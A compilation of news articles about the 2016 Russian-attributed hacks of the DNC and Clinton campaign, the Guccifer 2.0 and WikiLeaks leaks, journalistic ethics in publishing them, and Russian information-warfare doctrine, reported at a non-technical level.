By their very nature, ad networks provide excellent target profiling through a combination of IPs, browser fingerprinting, and browsing interest and login selectivity.

This kind of user data allows a discriminate attacker to selectively inject or redirect specific victims to their payloads and thus largely avoid collateral infections and the persistent availability of payloads that tend to pique the interest of security researchers.

As such, we expect the most advanced cyberespionage actors to find the creation or co-opting of an ad network to be a small investment for sizable operational returns, hitting their targets while protecting their latest toolkits. Forecast for 2017: rapid evolution of false-flag cybercriminal operations Tweet The rise of the vigilante hacker Following his indiscriminate release of the HackingTeam dump in 2015, the mysterious Phineas Fisher released his guide for aspiring hackers to take down unjust organizations and shady companies.

This speaks to a latent sentiment that the asymmetrical power of the vigilante hacker is a force for good, despite the fact that the HackingTeam dump provided live zero-days to active APT teams and perhaps even encouragement for new and eager customers.

As the conspiratorial rhetoric increases around this election cycle, fuelled by the belief that data leaks and dumps are the way to tip the balance of information asymmetry, more will enter the space of vigilante hacking for data dumps and orchestrated leaks against vulnerable organizations. Forecast for 2017: cybercriminals increasingly turn to social and advertising networks for espionage Tweet
EnlargeGeorge Hodan reader comments 166 Share this story Since June, some entity has been releasing e-mails and electronic documents obtained via network intrusions and credential thefts of politicians and political party employees. Some of the releases have appeared on sites believed to be associated with Russian intelligence operations; others have appeared on Wikileaks. On occasion, the leaker has also engaged journalists directly, trying to have them publish information drawn from these documents—sometimes successfully, other times not. The US government has pinned at least some of the blame for these leaks on Russia. This has led some observers to argue that WikiLeaks and Russian intelligence agencies are "weaponizing" the media. This is what national security circles refer to as an "influence operation," using reporters as tools to give credibility and cover to a narrative driven by another nation-state. The argument is that by willingly accepting leaked data, journalists have (wittingly or not) aided the leaker's cause. As such, they have become an "agent of influence." The Grugq, a veteran information security researcher who has specialized in counterintelligence research and a former employee of the computer security consulting company @stake, penned an article about the topic yesterday. "The primary role for an agent of influence," he wrote, "is to add credibility to the narrative/data that the agency is attempting to get out and help influence the public." Such agents might friendly with or controlled by the agency trying to spread the information, but they can also be unwitting accomplices "sometimes called a 'useful idiot,' unaware of their role as conduits of data for an agency." The actual impact of the leaked information on the US presidential election may not matter to an influence operation. The intended target of the campaign being waged through the WikiLeaks dumps, Guccifer 2.0, and DCLeaks is likely a larger public—perhaps including citizens in Russia itself and the people and decision-makers of the bordering nations. As Ars previously reported, the attacks on the Democratic National Committee (DNC) and on the US political process may be tied to a Russian effort to "contain" US foreign policy efforts and undermine confidence among the citizens of eastern European NATO members. The continued dumping of documents—and the chaos it creates for the US political process—shows the world that Russia can act upon the US at a distance. Therefore, Russia can also project power much closer to home. Assuming this attribution and analysis is in some broad sense accurate, the raises a question: what's a journalist to do with these sorts of hacks and leaks? Has everyone who draws on them become an unwitting "agent of influence?" And if so, is that actually a bad thing if the leaks are newsworthy? Ethics in information warfare journalism Dealing with a source's motivations is not a new problem for the press. Journalists get used all the time (just as they sometimes "use" their sources; it's part of the circle of life for investigative reporting). "The decision about whether or not to publish has always been about whether or not it's in the public interest, and also, I think, about what's the motivation or intention [of the source]," Jeremy Rue, acting dean of academics for the University of California at Berkeley's Graduate School of Journalism, told Ars. "Often journalists are so eager to get information, they don't take the time to ask what the motivation is behind this source," Rue said. "I think those motivations are important to factor in. Whether or not it changes the choice to publish, I don't really want to take a specific stand on that. It's a very complex issue and it keeps coming up in newsrooms. But I do definitely feel strongly that you should absolutely weigh all the different factors, like what are the motivations of your source." Glenn Greenwald of The Intercept has vocally disagreed with the idea that the source's intentions are material to a reporters' job, particularly in the case of publishing WikiLeaks' recent dumps. To him, if it's news, it's should be reported—regardless of source and motivation. In a recent article, Greenwald wrote as much: Some have been arguing that because these hacks were engineered by the Russian government with the goal of electing Trump or at least interfering in US elections, journalists should not aid this malevolent scheme by reporting on the material. Leaving aside the fact that there is no evidence (just unproven US government assertions) that the Russian government is behind these hacks, the motive of a source is utterly irrelevant in the decision-making process about whether to publish. While nothing in the public domain explicitly links the Russian government to the overall operation, there's at least some suggestive public evidence of Russia's involvement with Guccifer 2.0—who gave Greenwald exclusive access to some of the breach content—and with the DCLeaks "American hacktivist" site. That evidence includes both analysis by security experts of the initial Guccifer 2.0 document dump and an investigation by The Smoking Gun in August, which was triggered by Guccifer 2.0 reaching out directly to the site. For The Grugq, the way Greenwald has interacted with Guccifer 2.0 looks like a perfect example of how an influence operation works. "The Intercept was given 'exclusive' access to e-mails obtained by the entity known as Guccifer 2.0," he wrote. "The Intercept was both aware that the e-mails were from Guccifer 2.0, that Guccifer 2.0 has been attributed to Russian intelligence services, and that there is significant public evidence supporting this attribution." For a site like Wikileaks, the questions extend further. Assuming that it's right to publish material regardless of the source's motivations, how much of that material is fair game? The Investigative Reporter's Handbook frames the decision this way: When exposing private behaviors of public figures a reporter must make sure there is a need for the public to know this information. If there is not than a reporter should not report on it. If the behavior does not affect the figures public performance than there is no need to report on it. Naomi Klein, speaking on Glenn Greenwald's podcast this week, said something similar when talking about WikiLeaks: They’re very clearly looking for maximum media attention and you can tell that just by looking at the WikiLeaks Twitter feed and at how they are timing it right before the debates... These leaks are not, in my opinion, in the same category as the Pentagon Papers or previous WikiLeaks releases like the trade documents they continue to leak, which I am tremendously grateful for, because those are government documents that we have a right to, that are central to democracy. There are many things in that category. But personal e-mails—and there’s all kinds of personal stuff in these e-mails—this sort of indiscriminate dump is precisely what Snowden was trying to protect us from. For Wikileaks, of course, it's all fair game in the name of radical transparency. Snapperjack Between Scylla and Charybdis While there were certainly influence operations in the pre-Internet era, data breaches and digital media (including social media) have made them more accessible even to non-state actors. The "Climategate" incident, in which a collection of e-mails from the Climate Research Unit at the University of East Anglia was leaked in an attempt to sow doubt about scientists' consensus on climate change, is an example of selective publication of information to create controversy and political ammunition. So is the recent "Panama Papers" leak (which the Russian government has suggested was a US information operation). But if the DNC leaks and the wave of other breaches of political figures' e-mails have been an influence operation, they have operated at a much larger scale with much broader ambitions. There's enough to be concerned about ethically when it comes to accurate leaked data being provided by someone running an intentional influence campaign. But things get more complicated when false information is introduced into leaks. While WikiLeaks claims "a 100 percent accuracy rate" for its leaked documents, materials provided by Guccifer 2.0 showed signs of alteration. The entity behind Guccifer 2.0 claimed that one document was a file classified Secret and taken from the computer Hillary Clinton used at the State Department. But the document, which was actually an Obama transition team memorandum from before Clinton was even a nominee for Secretary of State, had been modified to include "Secret" in the document's header. This is the sort of thing that Jack Goldsmith, a former Department of Justice official, warned about at a recent seminar at Yale University. "Theft and publication of truthful information is small beans—what about theft and publication of faked information, which is hard to verify, or tampering with the vote itself?" Goldsmith said. "That could have huge consequences, the number of actors who could do this are many, and our ability to defend against it is uncertain." That places journalists trying to use the documents from these dumps in a very tight spot, trying to both determine the veracity of content they've obtained and decide its newsworthiness. Yes, journalists have been used for propaganda purposes before. Journalists are used by politicians and government agencies every day to put out information to shape perception. Wikileaks' dumps of the Podesta e-mails and other Democratic Party documents show among other things how journalists both use and are used by their sources, ingratiating themselves to get access. But this is the first time a foreign government's agent has used the combination of network infiltration, data theft, and public leaking of that data to the press and the world to affect another country's election—and the perception of that other country's election in areas of the world. Scott E. DePasquale, Senior Fellow at the Atlantic Council's Brent Scowcroft Center for International Security and Chairman & CEO of Utilidata, suggests that Wikileaks' decisions have made it a classic agent of influence. "We can divorce ourselves from whether Russia has actually paid the bills [for WikiLeaks] with no questions and no doubts that Assange knows he is doing benefit to Russia," he said. "Whether we get down to if they're on the Russian payroll, is it a deeply covert intelligence operation or something like that—all of that aside, because I think those are impossible questions to answer and even shed light on in an unclassified domain—it is without a doubt that Assange knows what he is doing is benefiting Russia. Whether he's doing it out of spite for the US as a political activist, or he is using the Russians... whatever the modality is, he knows very well that his interest and Putin's interest are deeply aligned. And that's deeply troubling for us at the end of the day." The worries don't even end with the first reporters to hit publish. Questions linger even for more traditional journalists who use only small bits of the most newsworthy leaked material. "There's the complicitness of serving this role of disseminating news for a state actor like Russia," said Rue. "I think that is a factor that should be part of the equation of whether or not to decide to publish something." A reporter or news organization may still decide that it's worth it to run with the material even if they believe that it's been provided by Russia "trying to embarrass the Clinton campaign," Rue acknowledged. But "you have to consider that as part of the equation to publish." The ethical decisions journalists now make about how they interact with that data are much more complicated as a result. And because of the impact of this particular influence operation, this approach may well become the norm—with more countries seeking to expose each others' secrets using journalists as their proxies.
Putin us on.Presidential Press and Information Office reader comments 130 Share this story The Office of the Director of National Intelligence and the Department of Homeland Security today jointly charged that the Russian government was responsible for directing a series of intrusions into the networks of US political organizations and state election boards.
In a “joint security statement,” officials from the two agencies declared they were “confident” that the government of President Vladimir Putin was behind the hacks and the publication of data obtained from them—some of it doctored—specifically to impact the results of the upcoming US elections. In a joint statement, agency officials asserted the following: The U.S.
Intelligence Community (USIC) is confident that the Russian Government directed the recent compromises of e-mails from US persons and institutions, including from US political organizations.

The recent disclosures of alleged hacked e-mails on sites like DCLeaks.com and WikiLeaks and by the Guccifer 2.0 online persona are consistent with the methods and motivations of Russian-directed efforts.

These thefts and disclosures are intended to interfere with the US election process. The officials also accused Russia of being behind attacks on some state election board systems. This type of interference, DHS and ODNI officials noted, is “not new to Moscow—the Russians have used similar tactics and techniques across Europe and Eurasia, for example, to influence public opinion there.” And they dismissed any contention that the attacks came from independent actors within Russia or at the direction of lower-level intelligence operatives, stating, “We believe, based on the scope and sensitivity of these efforts, that only Russia's senior-most officials could have authorized these activities.” There has been ample documentation of past efforts by groups of actors within the Russian Federation to shape public opinion elsewhere, just as there is documentation of Russia’s overall doctrine for conducting information warfare against adversaries outside the bounds of actual war.

An investigation by Adrian Chen for the New York Times Magazine published in 2015 documented how a Russia-based “Internet Research Agency” created fake Twitter profiles and posted misinformation on things ranging from fictional chemical plant accidents to Ebola hoaxes in various locations around the US.

The “agency” apparently hoped to spread panic and misinformation in order to undermine trust in US authorities.

And in other information operations, the Russian government has sought to shape opinion throughout Europe while quashing dissent at home. In a speech at the beginning of an Atlantic Council event in Berlin last year, US Ambassador to Germany John Emerson described Russia’s larger disinformation campaign, saying: The Russian government and the media that it controls are trying to prevent the publication of information that doesn’t conform to Russia's aims and are manipulating the presentation of information to cloak Russia’s actions.

The Kremlin’s disinformation campaign goes far beyond controlling its own media.
It is aimed at nothing less than presenting a parallel version of reality and disseminating it as if it were news.

The Kremlin’s goal is to make people question the value of media at all; to reject the idea of an absolute truth; and to persuade the public that “reality” is relative...

This campaign of obfuscation has become all too familiar since the occupation of Crimea. Emerson noted that some have described Russia’s information warfare model as the “4D” approach: dismiss factual reports, distort the truth with planted information, distract from actions by generating counter-narratives, and dismay those who fail to accept the Russian view with threats of reprisal. The efforts by Guccifer 2.0 and DCLeaks appear to be aimed at distorting and distracting the American public as elections approach to gain some sort of advantage in its outcome.

But ODNI and DHS officials offered assurances that there was little chance Russia could directly affect the election by hacking voting systems themselves.
In a joint statement, officials said: The USIC and the Department of Homeland Security (DHS) assess that it would be extremely difficult for someone, including a nation-state actor, to alter actual ballot counts or election results by cyber attack or intrusion.

This assessment is based on the decentralized nature of our election system in this country and the number of protections state and local election officials have in place.
States ensure that voting machines are not connected to the Internet, and there are numerous checks and balances as well as extensive oversight at multiple levels built into our election process. Still, DHS is offering state officials assistance in improving the security of their systems, and several states have taken them up on the offer.

Through an Election Infrastructure Cybersecurity Working Group “DHS is providing several services to state and local election officials to assist in their cybersecurity,” officials explained. “These services include cyber ‘hygiene’ scans of Internet-facing systems, risk and vulnerability assessments, information sharing about cyber incidents, and best practices for securing voter registration databases and addressing potential cyber threats.” While DHS and ODNI are confident about the source of the hacks of the DNC and other organizations, the Justice Department shows no indication that it is ready to press a case against individuals in Russia as it did in the case of past intrusions blamed on China.

And beyond acknowledging Russia’s role, it’s not clear what sort of action the US can take in response.
Click To View Slideshow» In recent decades, we've seen some of the most secure servers in the world breached by black hats. Last month, the media was all abuzz about the Democratic National Committee email hack and subsequent Wikileaks dump, which revealed bias against Bernie Sanders.

Donald Trump even weighed in and said that he hoped Russia would continue to compromise American networks and further weaken Hillary Clinton, which is pretty intense.
Information warfare is more serious than ever, and governments and companies are on guard. Unfortunately, being vigilant just isn't cutting it. Over the last few decades, we've seen some of the most secure servers in the world breached by black hats.
In this feature, we'll spotlight the intrusions and leaks that caused serious damage, whether it be financial or informational.
An attendee at the first day of the Democratic National Convention protests the DNC's treatment of Bernie Sanders, as hinted at by e-mails exposed by an alleged Russian hack.Chip Somodevilla , Getty News Images reader comments 150 Share this story The well-timed leak of e-mails from the Democratic National Committee, following a long-running breach of the DNC's network, is a masterful piece of information warfare.

The leak may only be the beginning of an effort to shape the US presidential election, or it may be a backup plan triggered by the exposure of the long-running breach.

But the hacking of the DNC and the direct targeting of Hillary Clinton are only parts of a much larger operation by Russia-based hackers who have breached a number of US government networks. Evidence collected by the security firm CrowdStrike and forensic work by Fidelis point to the breach being caused by two "threat groups" associated with Russian intelligence organizations.

A pair of reports published in June by SecureWorks suggests that the same threat groups conducted phishing campaigns against the e-mail addresses of the DNC.

The same attackers targeted the addresses of Clinton campaign staffers, political consultants, journalists, and current and former members of the military, among others. At a minimum, this suggests that the DNC breach was part of a larger intelligence collection operation.

The leaked data from the DNC breach, however, may have been intended to create chaos and uncertainty around the election.

But why would the Russian government open that can of worms? It's possible that this fits into a larger Russian strategy aimed at splintering NATO and countering what Russia has seen over the past decade as encroachment by the West on Russia's national interests. This sort of activity fits well into a larger picture of Russian state-sponsored and state-aligned information operations, including destructive cyber-attacks and intelligence collection.

And the forensic evidence from the DNC breach fits right in with other recent operations by Russian hackers against US targets. Bear Facts Two specific malware families tied to Russian hackers were identified in CrowdStrike's analysis of the DNC breach.

CrowdStrike identified them as "Fancy Bear" and "Cozy Bear." Fancy Bear is the malware family tied to "Operation Pawn Storm" and other recent breaches targeting members of the media, US and NATO allied military organizations, government agencies, embassies, and defense contractors, as well as Russian political dissidents and opposition political parties. The Fancy Bear/Pawn Storm attacks date back to 2004.

They were originally focused on NATO-connected military and government organizations.
In many cases, the attacks used a fake Outlook Web Access login page to collect a victim's login credentials. The other malware, Cozy Bear (aka CozyDuke) first emerged in 2011.

Cozy Bear was involved in network intrusions on the unclassified networks of the White House, the Joint Chiefs of Staff, and the State Department.

The JCS hack occurred, reportedly, via a spear phishing attack via e-mail.

The phishing was disguised as a communication from a financial institution commonly used by members of the military.

Also typically installed by a phishing attack, the Cozy Bear implant is a combination of remote access backdoor, keylogger, screenshot capturer, and password stealer.
It can also be used to remote-install other malware on the victim's Windows computer.
If Cozy Bear captures the right credentials, it can connect to other systems and spread laterally through a network. As SecureWorks researchers investigated the latest iteration of the Pawn Storm malware in mid-2015, their analysis led to a set of domains, all registered with the same e-mail. One of those domains was a lookalike domain that spoofed a Google URL.

The domain was spotted by a researcher in a report from the phishing attack tracking site Phishtank.com.

The domain was associated with an IP address at a hosting service in Romania. "The phishing URL looked interesting because it was passing through a lot of parameters," said Tom Finney of SecureWorks.

Those parameters included a specific encoded Google account name. "At almost the same time that the Phishtank user submitted that URL, they also submitted a Bit.ly short link," Finney added. "So we opened that short link and saw it was directing to the original phishing URL." Enlarge / The fake Google login page associated with the Bit.ly links used in the phishing campaign SecureWorks tracked. Phishtank.com Using Bit.ly's application interface, SecureWorks researchers were able to search for all the short links associated with the domain in question. "The short links were all connected to one user, and going from that one domain we had a whole heap of short links," Finney said. "Each resolved to having coded in them the e-mail address and account details of an individual—they were creating short links for each target." Tracking the generation of the URLs, Finney said that it became clear that the attackers were systematically accessing a list of e-mail addresses for a specific subset of targets on a daily basis. "In May and June [of 2015], when [the attackers] were creating these short links every day, it was quite industrial," he said, "suggesting there was quite an organization behind it—there were some significant resources being thrown at this.
It gave me the impression looking at the data that someone was following a tasking, because you would have a day where they would target military attachés—say every mil attaché that they could find that was based in Ankara, for example, and the next day it would be military attachés in some other European country.
It was very systematic in that respect." Between October 2015 and May 2016, SecureWorks researchers analyzed a total of 8,909 Bitly links, targeting 3,907 Google accounts—some of them individual Gmail accounts and others associated with organizational Google Apps accounts.

A large portion of the links, identified by SecureWorks through open source searches, belonged to people who would have been of interest in regard to Russia’s military involvement in eastern Ukraine. "For example," the SecureWorks researchers wrote in a post, "the e-mail address targeted by the most phishing attempts (nine) was linked to a spokesperson for the Ukrainian prime minister. Other targets included individuals in political, military, and diplomatic positions in former Soviet states, as well as journalists, human rights organizations, and regional advocacy groups in Russia." Another large group of the Gmail accounts targeted were those of current and former US and allied military members.

That group included people who worked for defense contractors, US and European politicians and government employees, and authors and journalists.
Some of these were discovered through open source searches by SecureWorks because the addresses had been published somewhere on the Web and pulled into a database. However, a large portion of them were not found in an open search, suggesting they had been either harvested from other compromised accounts or had been found through some other breach. Phishing for pols But as the links continued to be generated, a new type of target emerged.

Between March and April of 2016, an analysis of the URLs showed the phishing URL was used in tailored versions for 108 e-mail addresses tied to the Clinton campaign's hillaryclinton.com Google Apps account.

Those addresses included the campaign's national political director, finance director, director of strategic communications, director of scheduling, director of travel, traveling press secretary, and travel coordinator. Of the 108 e-mail addresses, 42 were not "open source," suggesting they had been acquired from another intelligence source. There were also links created that targeted 16 DNC e-mail addresses, including two belonging to a DNC secretary-emeritus and one belonging to the communications director.

And 26 personal Gmail accounts tied to the DNC and Hillary for America, including Clinton's director of speechwriting and a deputy director of DNC Chair Debbie Wasserman Schultz, were also targeted. There's no direct evidence that these phishing attempts, four of which were apparently clicked on according to analysis of Bit.ly, were directly tied to the DNC breach.

The DNC stopped using Google as a mail provider at some point.

But it is likely that some form of the phishing attack was used to drop the breach malware onto the DNC network. Both of these malware threats could have been on DNC's network for months before they were discovered.

The question that remains is why the attackers decided to leak what they had found instead of continuing to collect intelligence.

Finney said that it's possible that the e-mails were leaked only after the breach had been discovered as part of a disinformation operation.

The bad actors wanted to throw doubt on who actually hacked DNC and to make it look like a "hacktivist" did it. The document released under the identity "Guccifer 2.0" appears to be a poorly constructed disinformation play, as Ars has reported previously. Much of the metadata associated with the documents points to a Russian (or at least Russian-speaking) actor being behind them.

The fact that the Guccifer dump happened after the intrusion was detected and had been attributed by CrowdStrike to Russia lends credence to the idea that the leaks were a hurried response to the intrusion being exposed. But Michael Buratowski of Fidelis, the firm that performed the forensic analysis of the malware found at DNC, thinks the timing of the release of the e-mails shows intent to create chaos. "I do think that with what's been going on with the election cycle, it makes a lot of sense that this opportunity would be used... it's hard to speculate on what specific outcome [the attackers] were going for, but if nothing else, the amount of turmoil that [they've] created is pretty impactful with just the little bit of e-mail that's come out so far." Game of Pwns While the Fancy Bear and Cozy Bear threats have been identified in the past primarily as a means of intelligence collection, Russian attackers have gone for disruptive attacks before. Previous attacks have targeted Ukraine's power grid, Estonia's government and financial institutions, and government websites and systems in Georgia, culminating with the 2008 conflict over South Ossetia.

As with the DNC hack, it's difficult to tie those attacks to any specific organization in Russia.

But all evidence suggests they were done for the benefit of the Russian government. And disruption falls in line with Russian military and political doctrine.
Information warfare—including cyber attacks, "soft" cyber-like social media propaganda and disinformation, and the implication of the ability to inflict political and economic damage on potential or actual adversaries—is an integral part of Russian military doctrine.
Information warfare also factors into the Russian military-political concept of "containment"—preventing a potential adversary from attacks on Russia or threatening Russia's interests. Ever since Estonia, Latvia, and Lithuania joined the NATO alliance in 2004 (along with Bulgaria, Slovenia and Slovakia) the Russian government has often stated that NATO's activities have threatened Russia's strategic interests.

The alignment of Ukraine with the West and recent tensions with Turkey over the downing of a Russian strike fighter over Syria are among the many factors that have added to Russia's belief that the US and NATO pose a direct threat to Putin's idea of Russian interests. Lieutenant Colonel Petteri Lalu, head of the Concepts & Doctrine Division of the Finnish Defence Research Agency (FDRA), noted in a recent paper on Russian military theory that these sorts of "information operations" are seen as part of shaping "inter-state conflicts" regardless of whether they actually escalate to a military conflict.
In fact, they're seen as a way to preempt possible military conflict. "Information operations, which can be non-military or military, are proceeding throughout the conflict, i.e. continuously," Lalu wrote. "In this sense, discussions on whether the term information war or warfare can be used before a clearly verified armed attack or an imminent threat of such an attack takes place, do sometimes sound unpractical." Information warfare like the DNC breach fits into what the Soviet military theoretician Mikhail Tukhachevsky called "deep battle"—"influencing the enemy simultaneously throughout the whole depth of its territory." The main approach Russia has taken in information operations, Lalu noted, "has been breaking the unity of the target audience." Through its news media, through covert information operations, through use of social media (including Wikileaks and possibly fake Twitter accounts spewing populist/nationalist propaganda in various countries that the Russian government senses are vulnerable), and through hacking, Russia could seek to break the unity of NATO countries and undermine its military readiness. Maybe the DNC e-mail leak was an attempt to snatch some strategic value out of what would otherwise have been a relatively fruitless (and embarrassing) intelligence collection mission.

But if Putin's government did in fact calculate a benefit from throwing a stick into the spokes of the Democratic presidential convention, there may be a lot more surprises in store.